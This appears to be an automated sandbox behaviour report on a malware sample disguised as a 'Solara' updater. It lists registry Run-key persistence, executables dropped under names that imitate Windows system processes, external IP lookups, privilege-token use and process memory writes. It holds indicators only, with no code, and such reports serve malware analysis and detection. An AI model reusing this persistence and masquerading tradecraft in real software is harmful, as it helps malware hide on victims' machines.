Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Google\\csrss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Windows\\Registration\\CRMLog\\Loader.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Google\\csrss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC174D5A98CE104C60BF24872A9DF0C71.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\jpzkqk.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Sidebar\Shared Gadgets\5940a34987c991 C:\hostNet\bridgeblockportComBroker.exe N/A
File created \??\c:\Program Files (x86)\Microsoft\Edge\Application\CSC421E32B0FE4E49CA8B405B3551F9DCDF.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Google\886983d96e3d3e C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created \??\c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\9e8d7a4ca61bd9 C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files\WindowsApps\dwm.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files (x86)\Google\csrss.exe C:\hostNet\bridgeblockportComBroker.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Registration\CRMLog\Loader.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\Registration\CRMLog\87ba48885c7d9e C:\hostNet\bridgeblockportComBroker.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\hostNet\bridgeblockportComBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3460 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 3460 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 3460 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 3460 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 3460 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 3460 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 3460 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1276 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1276 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1276 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 5116 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 5116 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 5116 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 5116 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 5116 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 5116 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 5116 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1732 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1732 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1732 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 1732 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2480 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2480 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2480 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 3340 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
